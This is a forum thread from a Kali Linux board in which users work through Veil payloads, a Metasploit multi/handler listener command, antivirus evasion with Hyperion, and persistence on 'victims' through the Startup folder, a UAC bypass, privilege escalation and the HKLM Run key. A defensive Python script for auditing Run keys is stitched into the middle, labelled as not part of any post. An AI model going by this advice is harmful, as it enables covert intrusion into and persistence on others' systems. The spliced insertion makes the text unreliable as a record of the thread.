
Thread: Veil and SET integration

  1. #1

    Veil and SET integration

    Hi all,

    First of all thanks R.3volv3.R for guiding me to use Veil.

    Well, I created the payload with Veil. Then I went to run a listener with SET on Kali. I went through the following path:
    se-toolkit --> social-engineering --> Attacks --> create a payload and listener --> Import your own executable --> path to your executable --> start the listener

    Then I get this error:

    [!] Something went wrong , printing the error :name ' listen_path' is not defined.

    What is wrong with my procedure?
    Generally, is it possible to run a listener without creating a payload with SET? Or should I use something else, for example "nc"?

    Thanks for your help,

  2. #2
    try msfcli options E

  3. #3
    just run ~#: msfcli exploit/multi/handler LHOST=youripOnVeilSetting LPORT=yourportOnVeilSetting E [enter]

  4. #4
    Thanks a lot R.3volv3.R... now it does work.

    I did run "persistence" to make a backdoor on the victim. It created a .vbs file; unfortunately AV (NOD32) detects it.
    Is it possible to change the file type, or is there another trick, in order to evade AV?

    Best,
    Last edited by xerxes; 2013-08-08 at 14:56.

  5. #5
    This is the first I've heard of Veil. How does it compare with using something like Hyperion? I think Hyperion has a 100% success rate with bypassing AV.

  6. #6
    The .exe file created by Veil does bypass AV too. The problem is that after making the backdoor (running persistence), the result is a .vbs file. This .vbs is detected by AV.
    I'm going for Hyperion, hoping to solve the problem.

  7. #7
    Quote Originally Posted by xerxes View Post
    The .exe file created by Veil does bypass AV too. The problem is that after making the backdoor (running persistence), the result is a .vbs file. This .vbs is detected by AV.
    I'm going for Hyperion, hoping to solve the problem.
    I just did a test with Hyperion and it's sitting at about 12/45 detected on VirusTotal (shikata 20 iterations + Hyperion, backdoored in an existing exe), 19/45 if it's just a plain meterpreter payload encoded into an exe and then run through Hyperion.

    I haven't checked persistence, but if the persistence module always creates the .vbs file, the initial encoding won't matter. It's that the persistence module is creating a new file, and that's what is being detected. Hyperion at least may up the success rate of the initial exe though.
    Last edited by wurmt0ngue; 2013-08-10 at 14:32. Reason: correcting verbage

  8. #8
    Exactly. Maybe there would be a way to force the persistence module to create another type of file except .vbs. Any suggestions?
    Veil also uses pyherion as encrypter while making the payload.

  9. #9
    Quote Originally Posted by xerxes View Post
    Exactly. Maybe there would be a way to force the persistence module to create another type of file except .vbs. Any suggestions?
    Veil also uses pyherion as encrypter while making the payload.
    if your ""victims "" are windows-machine for persistence run another ways:
    1) stupid_basic....&..more... but effective ...upload the same payload (created previously &tested..with veil.py )...in windows AUTOSTART folder

    2) Technic-way...(i think)
    after have a meterpreter:
    -if windows-machine have enable UAC ....bypass it.....
    -get administrator privileges (privilege-escalation).....
    -interact with windows\system32.....
    -add a new-viral-key/process in.... HKLM\\software\\microsoft\\windows\\currentversion\\run

    bye
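
Added example (not part of any post in this thread), from the defender's side: the HKLM ...\CurrentVersion\Run key named in the post above is a standard autostart location to audit. The sketch below parses `reg query` output for that key and flags values that launch from user-writable directories or through a script host, such as the .vbs launcher discussed earlier in the thread; the sample output, the path heuristics and the function names are constructed for illustration.

```python
import re

# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# output (not taken from a real host).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VendorTray    REG_SZ    "C:\Program Files\Vendor\tray.exe" -min
    Updater    REG_SZ    C:\Users\bob\AppData\Local\Temp\svc.exe
    Helper    REG_SZ    wscript.exe "C:\Windows\Temp\kQzXw.vbs"
"""

# reg.exe prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# Heuristic (assumption): directories a non-admin user or dropped file typically lives in.
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata)\\", re.I)
# Heuristic (assumption): autostart through a script interpreter or a script file.
SCRIPT_HOST = re.compile(
    r"\b(wscript|cscript|mshta)(\.exe)?\b|\.(vbs|vbe|js|jse|bat|cmd)\b", re.I
)


def parse_run_values(text):
    """Yield (key, value_name, data) for every value line under a key header."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m["name"], m["data"]


def triage(text):
    """Return [(value_name, [reasons])] for autostart entries worth a closer look."""
    findings = []
    for _key, name, data in parse_run_values(text):
        reasons = []
        if USER_WRITABLE.search(data):
            reasons.append("user-writable path")
        if SCRIPT_HOST.search(data):
            reasons.append("script host or script file")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_REG_QUERY):
        print(f"{name}: {', '.join(reasons)}")
```

The same triage applies to the per-user Run key and to listings of the Startup folders; a hit is a lead for review, not a verdict.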

  10. #10
    Quote Originally Posted by zimmaro View Post
    if your ""victims "" are windows-machine for persistence run another ways:
    1) stupid_basic....&..more... but effective ...upload the same payload (created previously &tested..with veil.py )...in windows AUTOSTART folder

    2) Technic-way...(i think)
    after have a meterpreter:
    -if windows-machine have enable UAC ....bypass it.....
    -get administrator privileges (privilege-escalation).....
    -interact with windows\system32.....
    -add a new-viral-key/process in.... HKLM\\software\\microsoft\\windows\\currentversion\\run

    bye
    auto-quote
    i "replace" & old test ....&&..seems to work fine NOW......versus my AV && add a Persistence-part
    if you want to watch :
    http://vimeo.com/72131516
    bye

  11. #11
    Thank you zimmaro for the link, great and useful clips. Though I have got a problem running SSLStrip on easy-creds.
    By the way, what video capturing program do you use for the clips?

    Regards,

  12. #12
    Quote Originally Posted by xerxes View Post
    Thank you zimmaro for the link, great and useful clips. Though I have got a problem running SSLStrip on easy-creds.
    By the way, what video capturing program do you use for the clips?

    Regards,
    camtasia studio (v7).....for easy-creds you have opened another thread :http://forums.kali.org/showthread.ph...p-pane-missing

  13. #13
    Thanks. Yes, and I'm waiting for suggestions...

  14. #14
    Thanks Zimmaro,

    The problem is that after restarting the system, the payload (.exe file) runs before the network interface comes up, so no connection can be established. Is there any solution for this, for example giving a running delay to the .exe file, or making the .exe file run itself again and again until it gets connected?

    Regards,

  15. #15
    Quote Originally Posted by zimmaro View Post
    auto-quote
    i "replace" & old test ....&&..seems to work fine NOW......versus my AV && add a Persistence-part
    if you want to watch :
    http://vimeo.com/72131516
    bye

    Thanks Zimmaro,

    The problem is that after restarting the system, the payload (.exe file) runs before the network interface comes up, so no connection can be established. Is there any solution for this, for example giving a running delay to the .exe file, or making the .exe file run itself again and again until it gets connected?

    Regards,

  16. #16
    Quote Originally Posted by xerxes View Post
    Thanks Zimmaro,

    The problem is that after restarting the system, the payload (.exe file) runs before the network interface comes up, so no connection can be established. Is there any solution for this, for example giving a running delay to the .exe file, or making the .exe file run itself again and again until it gets connected?

    Regards,
    i THINK (my stupid-opinion)..one of the ways is ..you need a .bat file .INTO ..set delay for execute command (payloads) >>compile .bat +add payloads>>>.exe

    now i'm NOT tested it ...but for my stupid-mind is ..possible
    bye

  17. #17
    Hey everyone,

    When I copy the bypassuac.exe or any file other than the Veil-generated payload, the AV detects it.
    My question is: how could I encrypt a custom .exe (bypassuac, for example) so it wouldn't be detected by the AV? Can I use Veil for that (probably not)? I've poked around the web searching for alternatives, but all the ones I found relate to "Crypters" that lose their efficiency after a couple of weeks, nothing like Veil (by the way, congratulations to the creators of such an amazing tool).

  18. #18
    Hello, I have a question about Veil evasion/catapult/pillage.

    I have a machine that I am trying to play with on my network and I'm trying to launch a payload using Veil pillage. I don't have a password set up on this machine, but I can't figure out how to attack this machine because it doesn't have a login pass. Every time I go to launch a payload it asks for login credentials and it won't let me leave the pass/hash field blank. Any help would be great, thanks.
